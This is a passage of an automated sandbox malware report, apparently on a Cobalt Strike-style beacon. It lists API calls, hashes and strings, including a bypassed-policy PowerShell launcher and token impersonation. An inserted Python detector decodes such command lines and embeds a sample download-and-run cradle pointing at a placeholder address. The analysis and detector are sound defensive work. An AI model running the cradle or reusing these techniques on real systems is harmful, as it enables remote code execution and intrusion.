                • write_multi_char.LIBCMT ref: 0068375D
                • free.LIBCMT ref: 00683771
                • _isleadbyte_l.LIBCMT ref: 00683842
                • write_char.LIBCMT ref: 00683858
                • write_char.LIBCMT ref: 00683879
                • _errno.LIBCMT ref: 0068397C
                • _invalid_parameter_noinfo.LIBCMT ref: 00683987
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                • String ID: $@
                • API String ID: 3318157856-1077428164
                • Opcode ID: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
                • Instruction ID: 553c916e11350bd172c27715927b5fa2c9722ca7020bfaf0cce802a564827fec
                • Opcode Fuzzy Hash: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
                • Instruction Fuzzy Hash: D34244B26086A486EB25EF19D5543BE6BB3F741F90F140305DE4A17B98EB79CB41CB01
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00682589
                  • Part of subcall function 00681600: _getptd.LIBCMT ref: 00681616
                  • Part of subcall function 00681600: __updatetlocinfo.LIBCMT ref: 0068164B
                  • Part of subcall function 00681600: __updatetmbcinfo.LIBCMT ref: 00681672
                • _errno.LIBCMT ref: 0068258E
                  • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                • _fileno.LIBCMT ref: 006825BB
                  • Part of subcall function 00685A54: _errno.LIBCMT ref: 00685A5D
                  • Part of subcall function 00685A54: _invalid_parameter_noinfo.LIBCMT ref: 00685A68
                • write_multi_char.LIBCMT ref: 00682BEB
                • write_string.LIBCMT ref: 00682C08
                • write_multi_char.LIBCMT ref: 00682C25
                • write_string.LIBCMT ref: 00682C84
                • write_string.LIBCMT ref: 00682CBB
                • write_multi_char.LIBCMT ref: 00682CDD
                • free.LIBCMT ref: 00682CF1
                • _isleadbyte_l.LIBCMT ref: 00682DC2
                • write_char.LIBCMT ref: 00682DD8
                • write_char.LIBCMT ref: 00682DF9
                • _errno.LIBCMT ref: 00682EF3
                • _invalid_parameter_noinfo.LIBCMT ref: 00682EFE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                • String ID:
                • API String ID: 3318157856-3916222277
                • Opcode ID: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
                • Instruction ID: 2896283ac4f2a1ac83dbb9fac2a01ee60df2fa2cca1931e9dd44a3f7c29ad242
                • Opcode Fuzzy Hash: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
                • Instruction Fuzzy Hash: 3D32547220868686EF29EF15D5643BE6FB3FB45B94F241305DE4A17B68DB78C841CB40
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001C23FD
                  • Part of subcall function 001C0A00: _getptd.LIBCMT ref: 001C0A16
                  • Part of subcall function 001C0A00: __updatetlocinfo.LIBCMT ref: 001C0A4B
                  • Part of subcall function 001C0A00: __updatetmbcinfo.LIBCMT ref: 001C0A72
                • _errno.LIBCMT ref: 001C2402
                  • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                • _fileno.LIBCMT ref: 001C242F
                  • Part of subcall function 001C4E54: _errno.LIBCMT ref: 001C4E5D
                  • Part of subcall function 001C4E54: _invalid_parameter_noinfo.LIBCMT ref: 001C4E68
                • write_multi_char.LIBCMT ref: 001C2A6B
                • write_string.LIBCMT ref: 001C2A88
                • write_multi_char.LIBCMT ref: 001C2AA5
                • write_string.LIBCMT ref: 001C2B04
                • write_string.LIBCMT ref: 001C2B3B
                • write_multi_char.LIBCMT ref: 001C2B5D
                • free.LIBCMT ref: 001C2B71
                • _isleadbyte_l.LIBCMT ref: 001C2C42
                • write_char.LIBCMT ref: 001C2C58
                • write_char.LIBCMT ref: 001C2C79
                • _errno.LIBCMT ref: 001C2D7C
                • _invalid_parameter_noinfo.LIBCMT ref: 001C2D87
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                • String ID: $@
                • API String ID: 3318157856-1077428164
                • Opcode ID: 0917c7b026fa98026fd61c82a9db6b94b013ed73c29c4ccbf17a38093d3ada48
                • Instruction ID: 894fc212aefd36256bb4a76e233e0adf7cc69257a1cca1681f47039ea8f6e663
                • Opcode Fuzzy Hash: 0917c7b026fa98026fd61c82a9db6b94b013ed73c29c4ccbf17a38093d3ada48
                • Instruction Fuzzy Hash: E8421032608B9487EB29CF59D544FBE7BB0B775B84F24100EDE4A47AA8DB78C840CB01
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001C1989
                  • Part of subcall function 001C0A00: _getptd.LIBCMT ref: 001C0A16
                  • Part of subcall function 001C0A00: __updatetlocinfo.LIBCMT ref: 001C0A4B
                  • Part of subcall function 001C0A00: __updatetmbcinfo.LIBCMT ref: 001C0A72
                • _errno.LIBCMT ref: 001C198E
                  • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                • _fileno.LIBCMT ref: 001C19BB
                  • Part of subcall function 001C4E54: _errno.LIBCMT ref: 001C4E5D
                  • Part of subcall function 001C4E54: _invalid_parameter_noinfo.LIBCMT ref: 001C4E68
                • write_multi_char.LIBCMT ref: 001C1FEB
                • write_string.LIBCMT ref: 001C2008
                • _errno.LIBCMT ref: 001C22F3
                • _invalid_parameter_noinfo.LIBCMT ref: 001C22FE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$Locale_invalid_parameter_noinfo$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexitwrite_multi_charwrite_string
                • String ID: -$0
                • API String ID: 3246410048-417717675
                • Opcode ID: 9d83564e1f44511746efc6243833ea10ca1e0c0cc6e5e094e442fc0115aecad6
                • Instruction ID: a41121ecebb48c11a1d8c2787aaf8ced3d8e74097b573b9f87d3053120b2844f
                • Opcode Fuzzy Hash: 9d83564e1f44511746efc6243833ea10ca1e0c0cc6e5e094e442fc0115aecad6
                • Instruction Fuzzy Hash: 8D3225726486D496EB29CB55D544FBE7BB0F776784F28100EEF4A47AA9DB38C840CB00
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: __doserrno_errno_invalid_parameter_noinfo
                • String ID: U
                • API String ID: 3902385426-4171548499
                • Opcode ID: 1e306023ed328bab19b7a5d60cdebdd92491a2c212ad1309fcb9b443deab4914
                • Instruction ID: 22f53ffff2642abfb00545f65aa01530eb72d904a6e8a21be2e57ddf3167229a
                • Opcode Fuzzy Hash: 1e306023ed328bab19b7a5d60cdebdd92491a2c212ad1309fcb9b443deab4914
                • Instruction Fuzzy Hash: F7022533214B8186DB208F28E484BAEB776F7A5798F54011EEB8943B54DF3DE985CB10
                APIs
                • _snprintf.LIBCMT ref: 00677D66
                • _snprintf.LIBCMT ref: 00677D83
                • _snprintf.LIBCMT ref: 00677CA5
                  • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                  • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                • _snprintf.LIBCMT ref: 00677FD8
                • _snprintf.LIBCMT ref: 00678334
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _snprintf$_errno_invalid_parameter_noinfo
                • String ID: %s%s$%s%s$%s%s: %s$%s&%s$%s&%s=%s$?%s$?%s=%s
                • API String ID: 3442832105-1222817042
                • Opcode ID: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
                • Instruction ID: f165d54bb1ff977ae2693509bbd572190c045ac707b9e2ef795a30137aa3c4d4
                • Opcode Fuzzy Hash: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
                • Instruction Fuzzy Hash: B032E962614E8592EB258F2DE0452E9B3B1FF98799F049101EF8D17B21EF38D6A7C344
                APIs
                • malloc.LIBCMT ref: 00671C63
                  • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                  • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                  • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                  • Part of subcall function 0066D044: malloc.LIBCMT ref: 0066D057
                  • Part of subcall function 0066D074: htonl.WS2_32 ref: 0066D07F
                • GetCurrentDirectoryA.KERNEL32 ref: 00671CDB
                • FindFirstFileA.KERNEL32 ref: 00671D14
                • GetLastError.KERNEL32 ref: 00671D23
                • free.LIBCMT ref: 00671D5E
                • free.LIBCMT ref: 00671D6B
                  • Part of subcall function 0067F244: HeapFree.KERNEL32 ref: 0067F25A
                  • Part of subcall function 0067F244: _errno.LIBCMT ref: 0067F264
                  • Part of subcall function 0067F244: GetLastError.KERNEL32 ref: 0067F26C
                • FileTimeToSystemTime.KERNEL32 ref: 00671D78
                • SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 00671D89
                • FindNextFileA.KERNEL32 ref: 00671E46
                • FindClose.KERNEL32 ref: 00671E57
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: Time$FileFind_errno$ErrorHeapLastSystemfreemalloc$AllocCloseCurrentDirectoryFirstFreeLocalNextSpecific_callnewhhtonl
                • String ID: %s$.\*$D0%02d/%02d/%02d %02d:%02d:%02d%s$F%I64d%02d/%02d/%02d %02d:%02d:%02d%s
                • API String ID: 723279517-1754256099
                • Opcode ID: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
                • Instruction ID: fb2f42af140046c5152ca76007fff4314e7617e9a63a981f5e9d9da63bfdfffd
                • Opcode Fuzzy Hash: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
                • Instruction Fuzzy Hash: D051CF7270875196DB50DF66E8507AEA3A2F385B84F40402AEE4E47B58EF7CC60ACB40
                APIs
                • _snprintf.LIBCMT ref: 001B7166
                • _snprintf.LIBCMT ref: 001B7183
                • _snprintf.LIBCMT ref: 001B70A5
                  • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                  • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                • _snprintf.LIBCMT ref: 001B73D8
                • _snprintf.LIBCMT ref: 001B7734
                Strings
                • nop -exec bypass -EncodedCommand "%s", xrefs: 001B74D7
                • not create token: %d, xrefs: 001B7657
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _snprintf$_errno_invalid_parameter_noinfo
                • String ID: nop -exec bypass -EncodedCommand "%s"$not create token: %d
                • API String ID: 3442832105-3652497171
                • Opcode ID: 5c5fb6f4a09e06ccff5c46792293312cb34477fc99d63142bfc01bcec4b0117e
                • Instruction ID: 2f9b2cb9d9b2c9bc8f052c9aa5cc4283acf63cc8586ad332c123fcfba5c15db3
                • Opcode Fuzzy Hash: 5c5fb6f4a09e06ccff5c46792293312cb34477fc99d63142bfc01bcec4b0117e
                • Instruction Fuzzy Hash: 5732FC62618EC492EB259F2DE0413E9B3B0FFA8799F445501DF8917B65EF38D2A6C340
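The record above shows the beacon building a PowerShell launch line of the shape `-nop -exec bypass -EncodedCommand "%s"`, where `%s` is the base64 of a UTF-16LE script. The following triage check is an added example, not part of the Joe Sandbox report or of the analysed sample: it splits a process command line, resolves the abbreviated powershell.exe switches (PowerShell accepts any unambiguous prefix, so `-nop`, `-exec`, `-ep`, `-e` and `-ec` are all valid), decodes the encoded script and flags the combination of an encoded command with a bypassed execution policy or `-NoProfile`. The command lines and the script inside them are constructed here for illustration; the switch aliases are those documented for powershell.exe.

```python
"""Triage powershell.exe command lines of the '-nop -exec bypass -EncodedCommand'
shape: resolve abbreviated switches, recover the encoded script, flag the pattern."""
import base64
import shlex

# Constructed sample script standing in for the "%s" in the report's format string.
# -EncodedCommand carries base64 of the script encoded as UTF-16LE (no BOM).
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode("ascii")

# Constructed command lines (not taken from the sandbox report): one matching the
# beacon's pattern, one benign, one using the short switch aliases.
SAMPLE_CMDLINES = [
    f'powershell -nop -exec bypass -EncodedCommand "{SAMPLE_ENCODED}"',
    "powershell.exe -NoProfile -Command Get-Date",
    f'powershell -ep Unrestricted -e "{SAMPLE_ENCODED}"',
]


def _switch(tok):
    """Map a powershell.exe switch, in any accepted prefix form, to a canonical name.
    Per the powershell.exe documentation -e/-ec mean EncodedCommand and -ep/-ex...
    mean ExecutionPolicy; longer prefixes of the full names are accepted too."""
    t = tok.lower()
    if not t.startswith(("-", "/")):
        return None
    t = t.lstrip("-/")
    if t in ("e", "ec") or (t.startswith("en") and "encodedcommand".startswith(t)):
        return "encodedcommand"
    if t == "ep" or (t.startswith("ex") and "executionpolicy".startswith(t)):
        return "executionpolicy"
    if t.startswith("nop") and "noprofile".startswith(t):
        return "noprofile"
    return None


def decode_encoded_command(b64):
    """Decode an -EncodedCommand argument: base64 -> UTF-16LE text.
    Missing '=' padding is tolerated because some loaders strip it."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return raw.decode("utf-16le", errors="replace")


def analyse_cmdline(cmdline):
    """Return the resolved switches, the decoded script and a 'suspicious' verdict.
    shlex handles the double-quoted base64 argument; Windows paths containing
    backslashes would need a Windows-aware splitter instead of POSIX rules."""
    toks = shlex.split(cmdline, posix=True)
    out = {"noprofile": False, "execpolicy": None, "script": None}
    i = 1  # toks[0] is the image name
    while i < len(toks):
        sw = _switch(toks[i])
        if sw == "noprofile":
            out["noprofile"] = True
        elif sw == "executionpolicy" and i + 1 < len(toks):
            out["execpolicy"] = toks[i + 1].lower()
            i += 1
        elif sw == "encodedcommand" and i + 1 < len(toks):
            out["script"] = decode_encoded_command(toks[i + 1])
            i += 1
        i += 1
    # An encoded script combined with a relaxed execution policy or a profile-less
    # session is the shape the beacon's format string produces.
    out["suspicious"] = out["script"] is not None and (
        out["execpolicy"] in ("bypass", "unrestricted") or out["noprofile"]
    )
    return out


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        r = analyse_cmdline(line)
        print(f"suspicious={r['suspicious']} policy={r['execpolicy']} "
              f"noprofile={r['noprofile']} script={r['script']!r}")
```

The decoded script, not the base64 blob, is what should be matched against further rules and retained with the alert; the base64 changes with every beacon task while the decoded cradle does not.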
                APIs
                • CreateProcessAsUserA.ADVAPI32 ref: 00670F8F
                • GetLastError.KERNEL32 ref: 00670F9D
                • GetLastError.KERNEL32 ref: 00670FC1
                  • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FE81
                  • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FEA9
                • CreateProcessA.KERNEL32 ref: 00671013
                • GetLastError.KERNEL32 ref: 0067101D
                • GetCurrentDirectoryW.KERNEL32 ref: 00671374
                • GetCurrentDirectoryW.KERNEL32 ref: 00671388
                • CreateProcessWithTokenW.ADVAPI32 ref: 006713D1
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CreateErrorLastProcess$ByteCharCurrentDirectoryMultiWide$TokenUserWith
                • String ID:
                • API String ID: 3044875250-0
                • Opcode ID: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
                • Instruction ID: ddd496feb17ee8c2b893683ede9fb43acc4ce5d056f1b139581cf5cf7671d55c
                • Opcode Fuzzy Hash: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
                • Instruction Fuzzy Hash: EA619B72214B40D6EB20DF25E89435E73A6F749B94F10812AEA4E87B18DF7DC8A5CB50
                APIs
                • malloc.LIBCMT ref: 0067924F
                  • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                  • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                  • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                • _snprintf.LIBCMT ref: 00679267
                  • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                  • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                • FindFirstFileA.KERNEL32 ref: 00679272
                • free.LIBCMT ref: 0067927E
                  • Part of subcall function 0067F244: HeapFree.KERNEL32 ref: 0067F25A
                  • Part of subcall function 0067F244: _errno.LIBCMT ref: 0067F264
                  • Part of subcall function 0067F244: GetLastError.KERNEL32 ref: 0067F26C
                • malloc.LIBCMT ref: 006792CE
                • _snprintf.LIBCMT ref: 006792E6
                • free.LIBCMT ref: 0067930E
                • FindNextFileA.KERNEL32 ref: 00679327
                • FindClose.KERNEL32 ref: 00679338
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$Find$FileHeap_snprintffreemalloc$AllocCloseErrorFirstFreeLastNext_callnewh_invalid_parameter_noinfo
                • String ID: %s\*
                • API String ID: 2620626937-766152087
                • Opcode ID: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
                • Instruction ID: b9f7dc96f4b337169066c32773aa2e023003f420f908839e69a4b092d4227770
                • Opcode Fuzzy Hash: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
                • Instruction Fuzzy Hash: 5831D5113046C255DA15AB636C207B97BA7B74AFE0F88C125DEED0BB96CE39C563C314
                APIs
                • RtlCaptureContext.KERNEL32 ref: 00401A84
                • RtlLookupFunctionEntry.KERNEL32 ref: 00401A9B
                • RtlVirtualUnwind.KERNEL32 ref: 00401ADD
                • SetUnhandledExceptionFilter.KERNEL32 ref: 00401B21
                • UnhandledExceptionFilter.KERNEL32 ref: 00401B2E
                • GetCurrentProcess.KERNEL32 ref: 00401B34
                • TerminateProcess.KERNEL32 ref: 00401B42
                • abort.MSVCRT ref: 00401B48
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
                • String ID: @5E
                • API String ID: 4278921479-727458683
                • Opcode ID: 03ff3d805c6c5b31210b554aa0805c21f9c7c8b799266a99dd13c5c6293e079e
                • Instruction ID: d9c1a563eddaf3b5510b4e3cdc57f7cc7ddb545808ab7069b32be6ef691eb8bd
                • Opcode Fuzzy Hash: 03ff3d805c6c5b31210b554aa0805c21f9c7c8b799266a99dd13c5c6293e079e
                • Instruction Fuzzy Hash: A021E4B5601F55A6EB008F66FC8438A33B4B748BCAF500126EE4E5776AEF38C255C748
                APIs
                • GetModuleHandleA.KERNEL32 ref: 00673ACE
                • GetProcAddress.KERNEL32 ref: 00673ADE
                  • Part of subcall function 00673984: malloc.LIBCMT ref: 006739C2
                  • Part of subcall function 00673984: free.LIBCMT ref: 00673A45
                • CreateToolhelp32Snapshot.KERNEL32 ref: 00673B10
                • Thread32Next.KERNEL32 ref: 00673B7A
                • Sleep.KERNEL32 ref: 00673B90
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: AddressCreateHandleModuleNextProcSleepSnapshotThread32Toolhelp32freemalloc
                • String ID: NtQueueApcThread$ntdll
                • API String ID: 1427994231-1374908105
                • Opcode ID: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
                • Instruction ID: 173fb5629102f313e9d9874a9f15bb623e96bfa68c595a2679f6e732873ab5c7
                • Opcode Fuzzy Hash: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
                • Instruction Fuzzy Hash: 1A418B32701B519AEB20CB62E8407ED73B6FB58B88F54812ADE4D97B18EF39C645C744
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: bindclosesockethtonsioctlsocketlistensocket
                • String ID:
                • API String ID: 1767165869-0
                • Opcode ID: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
                • Instruction ID: 20277dcdf1c343fd712384b8841c0a27075375c39bd243faa5f60102d07d7b9e
                • Opcode Fuzzy Hash: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
                • Instruction Fuzzy Hash: 89112631310B5482DB248F16E420359B762F788FA4F858634EE5E53B64CF3DD456C700
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: bindclosesockethtonlhtonsioctlsocketsocket
                • String ID:
                • API String ID: 3910169428-0
                • Opcode ID: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
                • Instruction ID: d8364017e29b8a6f0fc31d9fb4209b82eade7849c5e9f444018a36658612b3d4
                • Opcode Fuzzy Hash: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
                • Instruction Fuzzy Hash: 0111B135311B4097D7249F21E8243997762F788BA4F958239DE1A43794DF3DC95AC740
                APIs
                  • Part of subcall function 0067DCC0: RevertToSelf.ADVAPI32 ref: 0067DCDD
                • LogonUserA.ADVAPI32 ref: 0067DF98
                • GetLastError.KERNEL32 ref: 0067DFA2
                  • Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008
                  • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FE81
                  • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FEA9
                  • Part of subcall function 0066D044: malloc.LIBCMT ref: 0066D057
                • ImpersonateLoggedOnUser.ADVAPI32 ref: 0067DFC0
                • GetLastError.KERNEL32 ref: 0067DFCA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharErrorLastMultiUserWidemalloc$ImpersonateLoggedLogonRevertSelf
                • String ID: %s\%s
                • API String ID: 3621627092-4073750446
                • Opcode ID: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
                • Instruction ID: c23be3ee67aa09ac1aac6bdd0082120723da9cefab7562a0a514cdcd65bd2716
                • Opcode Fuzzy Hash: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
                • Instruction Fuzzy Hash: 1A318B30314B4191EB40FB22F86435A23A7FB8AB80F804029EA4E57F66DF3EC165CB45
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CountSleepTick$closesocket
                • String ID:
                • API String ID: 2363407838-0
                • Opcode ID: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
                • Instruction ID: 225c3144836ed55f75402d078613cef5556b0c92f46d9bf16291872aee3931d8
                • Opcode Fuzzy Hash: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
                • Instruction Fuzzy Hash: A711D221704A8092CA50EB62F45521AA392F785BF0F444735FEBE47BE6DE3CC6468B45
                APIs
                • GetSystemTimeAsFileTime.KERNEL32 ref: 004019D5
                • GetCurrentProcessId.KERNEL32 ref: 004019E0
                • GetCurrentThreadId.KERNEL32 ref: 004019E8
                • GetTickCount.KERNEL32 ref: 004019F0
                • QueryPerformanceCounter.KERNEL32 ref: 004019FE
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                • String ID:
                • API String ID: 1445889803-0
                • Opcode ID: 50bcba46724f9b704bab53f94a1f403ca93275f12098583a90ed55ecc7962461
                • Instruction ID: e7f875539d2b8dca624fb493ee906b0c7b4db546ccc53074c796ddc42d9a9937
                • Opcode Fuzzy Hash: 50bcba46724f9b704bab53f94a1f403ca93275f12098583a90ed55ecc7962461
                • Instruction Fuzzy Hash: 09115EA6756B1482FB109B65FC0431973A0B788BF5F081671AE9D47BA4DE3CC589D708
                APIs
                Memory Dump Source
